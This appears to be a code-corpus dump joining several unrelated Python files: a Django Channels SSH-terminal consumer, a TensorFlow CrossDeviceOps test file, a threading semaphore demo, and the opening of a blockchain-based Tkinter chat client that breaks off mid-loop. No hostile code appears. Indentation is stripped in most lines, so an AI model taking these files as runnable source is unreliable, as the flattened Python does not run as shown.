# print('read: {!r}'.format(data))
if not data:
self.close(3333)
break
self.send(bytes_data=data)
def receive(self, text_data=None, bytes_data=None):
data = text_data or bytes_data
if data:
data = json.loads(data)
# print('write: {!r}'.format(data))
resize = data.get('resize')
if resize and len(resize) == 2:
self.chan.resize_pty(*resize)
else:
self.chan.send(data['data'])
def disconnect(self, code):
self.chan.close()
self.ssh.close()
# print('Connection close')
def connect(self):
if self.user.has_host_perm(self.id):
self.accept()
self._init()
else:
self.close()
def _init(self):
self.send(bytes_data=b'Connecting ...\r\n')
host = Host.objects.filter(pk=self.id).first()
if not host:
self.send(text_data='Unknown host\r\n')
            self.close()
            return
try:
self.ssh = host.get_ssh().get_client()
except Exception as e:
self.send(bytes_data=f'Exception: {e}\r\n'.encode())
self.close()
return
self.chan = self.ssh.invoke_shell(term='xterm')
self.chan.transport.set_keepalive(30)
Thread(target=self.loop_read).start()
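# ---------------------------------------------------------------------------
# Hedged sketch (an assumption, not part of this file): consumers like these
# are wired up through a Channels websocket routing module. The URL patterns
# and kwarg names below simply mirror what the consumers read from
# self.scope['url_route']['kwargs']; the project's real routing may differ,
# and on Channels < 3 the consumers would be referenced without .as_asgi().
#
# from django.urls import re_path
#
# websocket_urlpatterns = [
#     re_path(r'^ws/exec/(?P<token>[\w-]+)/$', ExecConsumer.as_asgi()),
#     re_path(r'^ws/ssh/(?P<id>\d+)/$', SSHConsumer.as_asgi()),
# ]
# ---------------------------------------------------------------------------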
|
cross_device_ops_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for CrossDeviceOps in v1 graph mode."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import os
import threading
import time
from absl.testing import parameterized
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.distribute import cluster_resolver
from tensorflow.python.distribute import collective_all_reduce_strategy
from tensorflow.python.distribute import collective_util
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import cross_device_ops as cross_device_ops_lib
from tensorflow.python.distribute import cross_device_utils
from tensorflow.python.distribute import device_util
from tensorflow.python.distribute import distribute_utils
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.distribute import multi_worker_util
from tensorflow.python.distribute import reduce_util
from tensorflow.python.distribute import strategy_combinations
from tensorflow.python.distribute import values as value_lib
from tensorflow.python.eager import context
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import kernels
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
def _get_devices(devices):
if isinstance(devices, (tuple, list)):
return tuple(device_util.resolve(d) for d in devices)
elif isinstance(devices, value_lib.DistributedValues):
return devices._devices
elif isinstance(devices, ops.Tensor):
return (device_util.resolve(devices.device),)
return (device_util.resolve(devices),)
def _make_per_replica(values, devices, regroup=False):
devices = _get_devices(devices)
assert len(values) == len(devices)
# We simulate the result of regroup called on PerReplica which strips the
# PerReplica wrapper if it has only one value.
if len(values) == 1 and regroup:
with ops.device(devices[0]):
placed_v = array_ops.identity(values[0])
return placed_v
index = []
for d, v in zip(devices, values):
with ops.device(d):
placed_v = array_ops.identity(v)
index.append(placed_v)
return distribute_utils.regroup(index)
# pylint: disable=g-doc-args,g-doc-return-or-yield
def _fake_mirrored(value, devices):
"""Create a faked Mirrored object for testing.
All components of the returned Mirrored have the same objects, which is not
true in reality.
"""
devices = _get_devices(devices)
values = []
for d in devices:
with ops.device(d):
values.append(array_ops.identity(value))
return distribute_utils.regroup(
values,
wrap_class=value_lib.Mirrored)
def _make_indexed_slices(values, indices, dense_shape, device):
with ops.device(device):
tensor = ops.IndexedSlices(
values=constant_op.constant(values),
indices=constant_op.constant(indices),
dense_shape=constant_op.constant(dense_shape))
return tensor
def _make_mirrored_indexed_slices(devices, values, indices, dense_shape):
values = [_make_indexed_slices(values, indices, dense_shape, d)
for d in devices]
return distribute_utils.regroup(
values,
wrap_class=value_lib.Mirrored)
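# ---------------------------------------------------------------------------
# Illustration (comments only, not part of the original test): an
# IndexedSlices value is a sparse stand-in for a dense tensor, e.g.
#
#   values=[[1., 2.], [3., 4.]], indices=[1, 3], dense_shape=[5, 2]
#
# densifies to [[0, 0], [1, 2], [0, 0], [3, 4], [0, 0]]. Summing two such
# values can produce a result with duplicated indices ([1, 1, 3]) or with the
# duplicates already merged ([1, 3]); both are semantically equal once
# densified, which is why the IndexedSlices tests below accept either form.
# ---------------------------------------------------------------------------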
_cpu_device = "/device:CPU:0"
class CrossDeviceOpsTestBase(test.TestCase, parameterized.TestCase):
def _assert_indexed_slices_equal(self, left, right):
self.assertIsInstance(left, ops.IndexedSlices)
self.assertIsInstance(right, ops.IndexedSlices)
self.assertEqual(
device_util.resolve(left.device), device_util.resolve(right.device))
self.assertAllEqual(
self.evaluate(ops.convert_to_tensor(left)),
self.evaluate(ops.convert_to_tensor(right)))
def _assert_mirrored_equal(self,
left_list,
right_list,
sess=None,
run_options=None):
if not isinstance(left_list, list):
left_list, right_list = [left_list], [right_list]
for left, right in zip(left_list, right_list):
self.assertEqual(type(left), type(right))
# Convert Mirrored to a list since sess.run(Mirrored) only returns one
# value.
if isinstance(left, value_lib.Mirrored):
left, right = left.values, right.values
else:
# When there's only one replica Mirrored is automatically unwrapped.
left, right = [left], [right]
for left_value, right_value in zip(left, right):
self.assertEqual(
device_util.resolve(left_value.device),
device_util.resolve(right_value.device))
# Densify IndexedSlices.
left = [ops.convert_to_tensor(v) for v in left]
right = [ops.convert_to_tensor(v) for v in right]
if not context.executing_eagerly():
left, right = sess.run((left, right), options=run_options)
for left_value, right_value in zip(left, right):
self.assertAllEqual(left_value, right_value)
def _testReductionAndBroadcast(self, cross_device_ops, devices):
if context.num_gpus() < sum(1 for d in devices if "GPU" in d.upper()):
self.skipTest("Not enough GPUs")
with self.cached_session() as sess:
values = [constant_op.constant(float(d)) for d in range(len(devices))]
per_replica = _make_per_replica(values, devices)
mean = (len(devices) - 1.) / 2.
values_2 = [constant_op.constant(d + 1.0) for d in range(len(devices))]
per_replica_2 = _make_per_replica(values_2, devices)
mean_2 = mean + 1.
destination_mirrored = _fake_mirrored(1., devices)
destination_different = _fake_mirrored(1.,
device_util.resolve(_cpu_device))
destination_str = device_util.resolve(_cpu_device)
all_destinations = [
destination_mirrored,
destination_different,
destination_str,
]
# test reduce()
for destinations in all_destinations:
self._assert_mirrored_equal(
cross_device_ops.reduce(
reduce_util.ReduceOp.MEAN,
per_replica,
destinations=destinations), _fake_mirrored(mean, destinations),
sess)
self._assert_mirrored_equal(
cross_device_ops.reduce(
reduce_util.ReduceOp.MEAN,
per_replica_2,
destinations=destinations),
_fake_mirrored(mean_2, destinations), sess)
self._assert_mirrored_equal(
cross_device_ops.reduce(
reduce_util.ReduceOp.SUM,
per_replica,
destinations=destinations),
_fake_mirrored(mean * len(devices), destinations), sess)
self._assert_mirrored_equal(
cross_device_ops.reduce(
reduce_util.ReduceOp.SUM,
per_replica_2,
destinations=destinations),
_fake_mirrored(mean_2 * len(devices), destinations), sess)
# test batch_reduce()
for d1, d2 in itertools.product(all_destinations, all_destinations):
self._assert_mirrored_equal(
cross_device_ops.batch_reduce(reduce_util.ReduceOp.MEAN,
[(per_replica, d1),
(per_replica_2, d2)]),
[_fake_mirrored(mean, d1),
_fake_mirrored(mean_2, d2)], sess)
self._assert_mirrored_equal(
cross_device_ops.batch_reduce(reduce_util.ReduceOp.SUM,
[(per_replica, d1),
(per_replica_2, d2)]),
[
_fake_mirrored(mean * len(devices), d1),
_fake_mirrored(mean_2 * len(devices), d2)
], sess)
# test broadcast()
for destinations in all_destinations:
self._assert_mirrored_equal(
cross_device_ops.broadcast(constant_op.constant(1.), destinations),
_fake_mirrored(1., destinations), sess)
def _testIndexedSlicesAllReduce(self, devices, cross_device_ops_instance,
reduce_op, batch_reduce):
with self.cached_session() as sess:
dense_shape = [5, 2]
t0 = _make_indexed_slices([[1., 2.]], [1], dense_shape, devices[0])
t1 = _make_indexed_slices([[3., 4.], [5., 6.]], [1, 3], dense_shape,
devices[1])
per_replica = value_lib.PerReplica((t0, t1))
if batch_reduce:
result = cross_device_ops_instance.batch_reduce(
reduce_op, [(per_replica, per_replica)])
else:
result = cross_device_ops_instance.reduce(reduce_op, per_replica,
per_replica)
total_indices_with_dups = [1, 1, 3]
total_indices_without_dups = [1, 3]
if reduce_op == reduce_util.ReduceOp.SUM:
total_values_with_dups = [[1., 2.], [3., 4.], [5., 6.]]
total_values_without_dups = [[4., 6.], [5., 6.]]
else:
assert reduce_op == reduce_util.ReduceOp.MEAN
total_values_with_dups = [[0.5, 1.], [1.5, 2.], [2.5, 3.]]
total_values_without_dups = [[2., 3.], [2.5, 3.]]
total_mirrored_with_dups = _make_mirrored_indexed_slices(
devices, total_values_with_dups, total_indices_with_dups, dense_shape)
total_mirrored_without_dups = _make_mirrored_indexed_slices(
devices, total_values_without_dups, total_indices_without_dups,
dense_shape)
# Test that the result is semantically equal to both the concatenated
# IndexedSlices, as well as when the duplicate indices are summed up.
if batch_reduce:
total_mirrored_with_dups = [total_mirrored_with_dups]
total_mirrored_without_dups = [total_mirrored_without_dups]
self._assert_mirrored_equal(total_mirrored_with_dups, result, sess)
self._assert_mirrored_equal(total_mirrored_without_dups, result, sess)
class SingleWorkerCrossDeviceOpsTest(CrossDeviceOpsTestBase):
reduction_to_one_combinations = combinations.combine(
cross_device_ops=[
combinations.NamedObject("DefaultReductionToOneDevice",
cross_device_ops_lib.ReductionToOneDevice()),
combinations.NamedObject(
"ReductionToCPUDeviceCrossDeviceOps",
cross_device_ops_lib.ReductionToOneDevice(
reduce_to_device=_cpu_device)),
combinations.NamedObject(
"AccumulateNCrossDeviceOp",
cross_device_ops_lib.ReductionToOneDevice(
accumulation_fn=math_ops.add_n)),
],
devices=[
["/cpu:0"],
["/cpu:0", "/gpu:0"],
["/gpu:0", "/gpu:1"],
],
mode=["graph", "eager"])
allreduce_combinations = combinations.combine(
cross_device_ops=[
combinations.NamedObject(
"AllReduce",
cross_device_ops_lib.AllReduceCrossDeviceOps("nccl", 1)),
combinations.NamedObject(
"AllReduceNoGradientRepacking",
cross_device_ops_lib.AllReduceCrossDeviceOps("nccl", 0)),
combinations.NamedObject("NcclAllReduce",
cross_device_ops_lib.NcclAllReduce()),
combinations.NamedObject(
"HierarchicalCopy",
cross_device_ops_lib.HierarchicalCopyAllReduce(8)),
],
devices=[
["/gpu:0", "/gpu:1"],
],
mode=["graph", "eager"])
@combinations.generate(reduction_to_one_combinations + allreduce_combinations)
def testReductionAndBroadcast(self, cross_device_ops, devices):
if isinstance(
cross_device_ops._obj, # pylint: disable=protected-access
cross_device_ops_lib.AllReduceCrossDeviceOps
) and context.executing_eagerly():
self.skipTest("b/149881884")
self._testReductionAndBroadcast(cross_device_ops, devices)
def testChooseAlgorithm(self):
    # Don't use nccl if there is any cpu device.
self.assertIsInstance(
cross_device_ops_lib.select_cross_device_ops(["/cpu:0"]),
cross_device_ops_lib.ReductionToOneDevice)
    # Don't use nccl if the requested device is not visible to TensorFlow.
# TODO(yuefengz): make `select_cross_device_ops` work with device strings
# self.assertIsInstance(
# cross_device_ops_lib.select_cross_device_ops(["/gpu:100"]),
# cross_device_ops_lib.ReductionToOneDevice)
if context.num_gpus() < 1:
return
devices = ["/gpu:0"]
def mock_get_registered_kernels_for_op(op):
if op == "NcclAllReduce":
return [object]
else:
return []
# Use nccl if nccl kernel is found.
with test.mock.patch.object(kernels, "get_registered_kernels_for_op",
mock_get_registered_kernels_for_op):
self.assertIsInstance(
cross_device_ops_lib.select_cross_device_ops(devices),
cross_device_ops_lib.NcclAllReduce)
    # Don't use nccl if the nccl kernel is not found.
with test.mock.patch.object(kernels,
"get_registered_kernels_for_op", lambda _: []):
self.assertIsInstance(
cross_device_ops_lib.select_cross_device_ops(devices),
cross_device_ops_lib.ReductionToOneDevice)
@combinations.generate(combinations.combine(
mode=["graph", "eager"],
required_gpus=1))
def testSimpleReduceWithIndexedSlices(self):
devices = ["/cpu:0", "/gpu:0"]
t0 = _make_indexed_slices([[1., 2.]], [1], [5, 2], devices[0])
t1 = _make_indexed_slices([[3., 4.], [5., 6.]], [1, 3], [5, 2], devices[1])
per_replica = value_lib.PerReplica((t0, t1))
result = cross_device_ops_lib._simple_reduce(
per_replica, devices[0], math_ops.add_n, reduce_util.ReduceOp.SUM)
# Test that the result is semantically equal to both the concatenated
# IndexedSlices with and without duplicate indices.
total_with_dups = _make_indexed_slices(
[[1., 2.], [3., 4.], [5., 6.]], [1, 1, 3], [5, 2], devices[0])
total_without_dups = _make_indexed_slices(
[[4., 6.], [5., 6.]], [1, 3], [5, 2], devices[0])
self._assert_indexed_slices_equal(total_with_dups, result)
self._assert_indexed_slices_equal(total_without_dups, result)
@combinations.generate(
combinations.combine(
cross_device_ops_instance=[
combinations.NamedObject(
"ReductionToOneDevice",
cross_device_ops_lib.ReductionToOneDevice()),
combinations.NamedObject(
"AllReduceCrossDeviceOps",
cross_device_ops_lib.AllReduceCrossDeviceOps())
],
reduce_op=[reduce_util.ReduceOp.SUM, reduce_util.ReduceOp.MEAN],
batch_reduce=[True, False],
mode=["graph", "eager"],
required_gpus=1))
def testIndexedSlicesAllReduce(self, cross_device_ops_instance, reduce_op,
batch_reduce):
devices = ["/cpu:0", "/gpu:0"]
self._testIndexedSlicesAllReduce(devices, cross_device_ops_instance,
reduce_op, batch_reduce)
@combinations.generate(
combinations.combine(
distribution=strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
cross_device_ops_instance=[
combinations.NamedObject(
"ReductionToOneDevice",
cross_device_ops_lib.ReductionToOneDevice()),
combinations.NamedObject(
"AllReduceCrossDeviceOps",
cross_device_ops_lib.AllReduceCrossDeviceOps("ring"))
],
batch_reduce=[True, False],
mode=["graph", "eager"]))
def testReduceDistributedVariable(self, distribution,
cross_device_ops_instance, batch_reduce):
with distribution.scope():
v = variables.Variable(1.)
if batch_reduce:
result = cross_device_ops_instance.batch_reduce(reduce_util.ReduceOp.MEAN,
[(v, v)])[0]
else:
result = cross_device_ops_instance.reduce(reduce_util.ReduceOp.MEAN, v, v)
for v in result.values:
self.assertIsInstance(v, ops.Tensor)
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(self.evaluate(result.values), [1.0, 1.0])
NUM_WORKERS = 3
CollectiveCommunication = cross_device_ops_lib.CollectiveCommunication
class CollectiveAllReduceTest(multi_worker_test_base.MultiWorkerTestBase,
CrossDeviceOpsTestBase):
collective_key_base = 100000
@classmethod
def setUpClass(cls):
"""Create a local cluster with 3 workers."""
cls._cluster_spec = multi_worker_test_base.create_in_process_cluster(
num_workers=NUM_WORKERS, num_ps=0)
def setUp(self):
super(CollectiveAllReduceTest, self).setUp()
# Reusing keys is not supported well. So we have to give a different
# collective key base for different tests.
CollectiveAllReduceTest.collective_key_base += 100000
def _get_test_objects(self,
task_type,
task_id,
num_gpus=0,
communication=CollectiveCommunication.AUTO,
use_strategy_object=False,
local_mode=False):
collective_keys = cross_device_utils.CollectiveKeys(
group_key_start=10 + CollectiveAllReduceTest.collective_key_base,
op_instance_key_start=100 + CollectiveAllReduceTest.collective_key_base,
variable_instance_key_start=10000 +
CollectiveAllReduceTest.collective_key_base)
if local_mode:
if num_gpus:
devices = ["/device:GPU:%d" % i for i in range(num_gpus)]
else:
devices = ["/device:CPU:0"]
if use_strategy_object:
strategy = (
collective_all_reduce_strategy.CollectiveAllReduceStrategy
._from_local_devices(devices, communication=communication)) # pylint: disable=protected-access
strategy.extended._collective_keys = collective_keys
strategy.extended._cross_device_ops._collective_keys = collective_keys
strategy.extended._host_cross_device_ops._collective_keys = (
collective_keys)
return strategy, devices, ""
else:
collective_all_reduce_ops = cross_device_ops_lib.CollectiveAllReduce(
devices=devices,
group_size=len(devices),
collective_keys=collective_keys,
communication=communication)
return collective_all_reduce_ops, devices, ""
else:
      # NCCL requires physical GPUs for every replica, which we can't do with
      # a simulated multi-host setup right now.
assert communication != CollectiveCommunication.NCCL
if num_gpus:
devices = [
"/job:%s/task:%d/replica:0/device:GPU:%d" % (task_type, task_id, i)
for i in range(num_gpus)
]
else:
devices = [
"/job:%s/task:%d/replica:0/device:CPU:0" % (task_type, task_id)
]
if use_strategy_object:
resolver = cluster_resolver.SimpleClusterResolver(
cluster_spec=multi_worker_util.normalize_cluster_spec(
self._cluster_spec),
task_type=task_type,
task_id=task_id,
num_accelerators={"GPU": num_gpus})
strategy = collective_all_reduce_strategy.CollectiveAllReduceStrategy(
cluster_resolver=resolver, communication=communication)
strategy.extended._collective_keys = collective_keys
strategy.extended._cross_device_ops._collective_keys = collective_keys
return (strategy, devices,
"grpc://" + self._cluster_spec[task_type][task_id])
else:
collective_all_reduce_ops = cross_device_ops_lib.CollectiveAllReduce(
devices=devices,
group_size=len(devices) * NUM_WORKERS,
collective_keys=collective_keys,
communication=communication)
return (collective_all_reduce_ops, devices,
"grpc://" + self._cluster_spec[task_type][task_id])
def _assert_mirrored_equal(self, left_list, right_list, sess=None):
if context.executing_eagerly():
run_options = None
else:
# TODO(b/151025792): figure out why missing run options would make the
# test flaky and whether this is a problem in TF 2.
run_options = config_pb2.RunOptions()
run_options.experimental.collective_graph_key = 5
super(CollectiveAllReduceTest, self)._assert_mirrored_equal(
left_list, right_list, sess, run_options=run_options)
def _test_reduction(self,
task_type,
task_id,
num_gpus,
communication,
use_strategy_object=False,
local_mode=False,
hints=None):
collective_all_reduce, devices, master_target = self._get_test_objects(
task_type,
task_id,
num_gpus,
communication=communication,
use_strategy_object=use_strategy_object,
local_mode=local_mode)
if local_mode:
num_workers = 1
worker_device = None
else:
num_workers = len(self._cluster_spec.get("chief", [])) + len(
self._cluster_spec.get("worker", []))
worker_device = "/job:%s/task:%d" % (task_type, task_id)
def _reduce(test_object, reduce_op, per_replica, destinations):
if use_strategy_object:
with test_object.scope():
return test_object.extended.reduce_to(reduce_op, per_replica,
destinations, hints)
else:
return test_object.reduce(reduce_op, per_replica, destinations, hints)
def _batch_reduce(test_object, reduce_op, value_destination_pairs):
if use_strategy_object:
with test_object.scope():
return test_object.extended.batch_reduce_to(reduce_op,
value_destination_pairs,
hints)
else:
return test_object.batch_reduce(reduce_op, value_destination_pairs,
hints)
with ops.Graph().as_default(), \
ops.device(worker_device), \
self.cached_session(target=master_target) as sess:
      # Collective ops don't support scalar tensors, so we have to construct
      # 1-d tensors.
values = [constant_op.constant([float(d)]) for d in range(len(devices))]
per_replica = _make_per_replica(values, devices)
mean = np.array([(len(devices) - 1.) / 2.])
values_2 = [constant_op.constant([d + 1.0]) for d in range(len(devices))]
per_replica_2 = _make_per_replica(values_2, devices)
mean_2 = np.array([mean[0] + 1.])
destination_mirrored = _fake_mirrored(1., devices)
destination_different = _fake_mirrored(1., _cpu_device)
destination_str = _cpu_device
all_destinations = [
destination_different, destination_mirrored, destination_str
]
# test reduce()
for destinations in all_destinations:
self._assert_mirrored_equal(
_reduce(
collective_all_reduce,
reduce_util.ReduceOp.MEAN,
per_replica,
destinations=destinations), _fake_mirrored(mean, destinations),
sess)
self._assert_mirrored_equal(
_reduce(
collective_all_reduce,
reduce_util.ReduceOp.MEAN,
per_replica_2,
destinations=destinations),
_fake_mirrored(mean_2, destinations), sess)
self._assert_mirrored_equal(
_reduce(
collective_all_reduce,
reduce_util.ReduceOp.SUM,
per_replica,
destinations=destinations),
_fake_mirrored(mean * len(devices) * num_workers, destinations),
sess)
self._assert_mirrored_equal(
_reduce(
collective_all_reduce,
reduce_util.ReduceOp.SUM,
per_replica_2,
destinations=destinations),
_fake_mirrored(mean_2 * len(devices) * num_workers, destinations),
sess)
# test batch_reduce()
for d1, d2 in itertools.product(all_destinations, all_destinations):
self._assert_mirrored_equal(
_batch_reduce(collective_all_reduce, reduce_util.ReduceOp.MEAN,
[(per_replica, d1), (per_replica_2, d2)]),
[_fake_mirrored(mean, d1),
_fake_mirrored(mean_2, d2)], sess)
self._assert_mirrored_equal(
_batch_reduce(collective_all_reduce, reduce_util.ReduceOp.SUM,
[(per_replica, d1), (per_replica_2, d2)]),
[
_fake_mirrored(mean * len(devices) * num_workers, d1),
_fake_mirrored(mean_2 * len(devices) * num_workers, d2)
], sess)
def _get_indexed_slices(self,
devices,
start_i,
variable_length,
as_per_replica=True):
dense_shape = [10, 2]
values = ([[1., 2.]], [[3., 4.]], [[2., 1.]], [[0., 0.]], [[3., 1.]],
[[2., 1.]])
indices = ([1], [2], [3], [4], [5], [6])
# values and indices that have variable lengths.
vl_values = ([[1., 2.], [3., 4.]], [[3., 4.]], [[2., 1.]], [[0., 0.]],
[[3., 1.], [2., 1.]], [[2., 1.]])
vl_indices = ([1, 2], [2], [3], [4], [5, 6], [6])
indexed_slices = []
for i, d in enumerate(devices):
idx = i + start_i
indexed_slices.append(
_make_indexed_slices(
vl_values[idx] if variable_length else values[idx],
vl_indices[idx] if variable_length else indices[idx], dense_shape,
d))
if as_per_replica:
per_replica = value_lib.PerReplica(indexed_slices)
return per_replica
else:
return indexed_slices
def _test_reduce_indexed_slices(self,
task_type,
task_id,
num_gpus,
communication,
batch_reduce,
variable_length,
local_mode=False):
collective_all_reduce, devices, master_target = self._get_test_objects(
task_type,
task_id,
num_gpus,
communication=communication,
local_mode=local_mode)
if local_mode:
num_workers = 1
worker_device = None
else:
num_workers = len(self._cluster_spec.get("chief", [])) + len(
self._cluster_spec.get("worker", []))
worker_device = "/job:%s/task:%d" % (task_type, task_id)
with ops.Graph().as_default(), \
ops.device(worker_device), \
self.cached_session(target=master_target) as sess:
per_replica = self._get_indexed_slices(devices,
(task_id or 0) * max(num_gpus, 1),
variable_length)
if batch_reduce:
result = collective_all_reduce.batch_reduce(
reduce_util.ReduceOp.SUM, [(per_replica, per_replica)])[0]
else:
result = collective_all_reduce.reduce(reduce_util.ReduceOp.SUM,
per_replica, per_replica)
if num_gpus > 1:
self.assertIsInstance(result, value_lib.Mirrored)
run_options = config_pb2.RunOptions()
run_options.experimental.collective_graph_key = 7
if num_gpus > 1:
result = sess.run([ops.convert_to_tensor(v) for v in result.values],
options=run_options)[0]
else:
result = sess.run(ops.convert_to_tensor(result), options=run_options)
# Reduce the same indexed slices on CPU locally as our expected results.
devices_cpu = [(worker_device or "") + "/device:CPU:0"] * (
max(num_gpus, 1) * num_workers)
per_replica_on_cpu = self._get_indexed_slices(
devices_cpu, 0, variable_length, as_per_replica=False)
expected_result = cross_device_utils.aggregate_tensors_or_indexed_slices(
per_replica_on_cpu)
expected_result = sess.run(ops.convert_to_tensor(expected_result))
self.assertAllEqual(expected_result, result)
@combinations.generate(
combinations.combine(
mode=["graph"],
required_gpus=[0, 1, 2],
use_strategy_object=[True, False],
bytes_per_pack=[0, 1, 4]))
def testReductionDistributed(self, required_gpus, use_strategy_object,
bytes_per_pack):
hints = collective_util.Hints(bytes_per_pack=bytes_per_pack)
self._run_between_graph_clients(
self._test_reduction,
self._cluster_spec,
required_gpus,
communication=CollectiveCommunication.RING,
use_strategy_object=use_strategy_object,
hints=hints)
@combinations.generate(
combinations.combine(
mode=["graph"],
required_gpus=[0, 1, 2],
variable_length=[True, False]))
def testReduceIndexedSlicesDistributed(self, required_gpus, variable_length):
self._run_between_graph_clients(
self._test_reduce_indexed_slices,
self._cluster_spec,
required_gpus,
communication=CollectiveCommunication.RING,
batch_reduce=True,
variable_length=variable_length)
  # Collective ops don't support a strategy with only one device.
@combinations.generate(
combinations.combine(
mode=["graph"],
required_gpus=2,
communication=[
CollectiveCommunication.NCCL, CollectiveCommunication.RING
],
use_strategy_object=[True, False]))
def testReductionLocal(self, required_gpus, communication,
use_strategy_object):
self._test_reduction(
None,
None,
required_gpus,
communication=communication,
use_strategy_object=use_strategy_object,
local_mode=True)
@combinations.generate(
combinations.combine(
mode=["graph"],
required_gpus=2,
batch_reduce=[True, False],
variable_length=[True, False],
communication=[
CollectiveCommunication.NCCL, CollectiveCommunication.RING
]))
def testReduceIndexedSlicesLocal(self, required_gpus, batch_reduce,
variable_length, communication):
self._test_reduce_indexed_slices(
None,
None,
required_gpus,
communication=communication,
batch_reduce=batch_reduce,
variable_length=variable_length,
local_mode=True)
@combinations.generate(
combinations.combine(
required_gpus=2,
mode="eager",
communication=[
CollectiveCommunication.NCCL, CollectiveCommunication.RING
]))
def testEagerMultiThread(self, communication):
collective, devices, _ = self._get_test_objects(
None,
None,
num_gpus=2,
communication=communication,
use_strategy_object=False,
local_mode=True)
# We would like to simulate the following sequence:
# thread-0 device0 device1
# thread-1 device0 device1
    # If the kernel launch sequence is used as-is, the program will deadlock
    # since NCCL requires the launch order to be the same on each device.
v0 = _make_per_replica([1.0 for _ in devices], devices)
v1 = _make_per_replica([2.0 for _ in devices], devices)
# Add a delay to collective_ops.all_reduce according to the input tensors
# index in `sequence.`
sequence = [v0.values[0], v1.values[0], v1.values[1], v0.values[1]]
all_reduce = collective_ops.all_reduce
def delayed_all_reduce(input_tensor, *args, **kwargs):
for idx, v in enumerate(sequence):
if input_tensor is v:
time.sleep(idx)
break
return all_reduce(input_tensor, *args, **kwargs)
with test.mock.patch.object(collective_ops, "all_reduce",
delayed_all_reduce):
# We only use NCCL for batch reduce with two or more values, so we use two
# values here.
def thread_fn():
reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v0, v0),
(v0, v0)])
self.assertAllEqual(reduced[0].values, [2.0, 2.0])
self.assertAllEqual(reduced[1].values, [2.0, 2.0])
t = threading.Thread(target=thread_fn)
t.start()
reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v1, v1),
(v1, v1)])
self.assertAllEqual(reduced[0].values, [4.0, 4.0])
self.assertAllEqual(reduced[1].values, [4.0, 4.0])
t.join()
if __name__ == "__main__":
# Set default inter op thread pool size to one to ensure we don't exhaust the
# thread pool with the additional executors to run collectives in eager.
os.environ["TF_NUM_INTEROP_THREADS"] = "1"
test.main()
|
sema_Resource_Control.py
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# sema_resource_control.py
#
# An example of using a semaphore to limit the number of threads that can
# use a resource at the same time (resource control)
import threading
import requests
import time
sema = threading.Semaphore(2) # Max: 2-threads
URL = 'https://stackoverflow.com'
def fetch_page(url):
sema.acquire()
try:
r = requests.get(url)
print(threading.current_thread(),r.status_code)
finally:
sema.release()
# In this example, only 2 threads can be executing the function at once (if there are more, they will have to wait).
for i in range(10):
t1 = threading.Thread(target=fetch_page,args=(URL,))
t1.start()
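# A slightly more idiomatic variant (sketch, not part of the original example):
# threading.Semaphore supports the context-manager protocol, so acquire/release
# can be written as a `with` block and the slot is released even on exceptions.
def fetch_page_ctx(url):
    with sema:
        r = requests.get(url)
        print(threading.current_thread(), r.status_code)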
|
tuxchat.py
|
# MIT License
# Copyright (c) 2022 bleach86, tuxprint#5176
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from bitcoinrpc.authproxy import AuthServiceProxy, JSONRPCException
import json
from tkinter import *
from tkinter import font, ttk, messagebox
from tooltip import ToolTip
import threading
import time
import re
from pygame import mixer
import pyperclip
import os
from datetime import datetime
import emoji
import names, tcinit
from tkinter.scrolledtext import ScrolledText
import platform
def settings():
with open('settings.json') as f:
settings = json.loads(f.read())
return settings
with open("emote.json", 'r', encoding='utf-8') as e:
emote = json.loads(e.read())
emoteList = emote
rpcproxy2 = AuthServiceProxy(f"http://{settings()['rpcConnection']['username']}:{settings()['rpcConnection']['password']}@{settings()['rpcConnection']['ip']}:{settings()['rpcConnection']['port']}")
version = 'v0.18-alpha'
def rpcproxy():
rpcproxy = AuthServiceProxy(f"http://{settings()['rpcConnection']['username']}:{settings()['rpcConnection']['password']}@{settings()['rpcConnection']['ip']}:{settings()['rpcConnection']['port']}")
return rpcproxy
focus = True
def getNames():
with open('names.json') as f:
screenNames = json.loads(f.read())
return screenNames
def getBlocked():
with open('blocklist.json') as f:
blocked = json.loads(f.read())
return blocked
def getMessages():
global seenTX
global bestBlock
message = []
    currentHeight = rpcproxy2.getblockcount() + 1
for i in range(bestBlock, currentHeight):
hash = rpcproxy2.getblockhash(i)
block = rpcproxy2.getblock(hash)
for txid in block['tx']:
if txid in seenTX:
seenTX.remove(txid)
continue
tx = rpcproxy2.getrawtransaction(txid, True)
if 'coinbase' in tx['vin'][0]:
#print('coinbase bitches')
continue
for i in tx['vout']:
